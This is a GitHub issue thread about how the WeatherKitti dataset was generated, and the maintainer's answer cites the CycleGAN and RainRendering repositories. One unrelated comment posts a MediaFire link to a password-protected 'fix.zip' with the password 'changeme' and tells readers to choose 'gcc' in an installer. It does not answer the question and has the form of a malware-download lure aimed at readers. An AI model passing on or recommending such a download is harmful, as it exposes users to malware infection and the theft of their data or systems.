### ISSUE TITLE
Generation of the WeatherKitti dataset

### ISSUE THREAD

**Issue by Hamusukesama** [wangjiyuan9/WeatherDepth#8]
Hello. Thank you for your excellent work! I'm interested in the generation process of your weather-augmented dataset WeaherKitti, and I wonder whether the code of GAN and PBR will be released?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wangjiyuan9** [comment]
It's based on [CycleGAN](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix.git) and [RainRendering](https://github.com/astra-vision/rain-rendering) Repo. I made little modifies to adapt to KITTI depth dataset. The other details can be found in [paper](https://arxiv.org/abs/2310.05556v2).
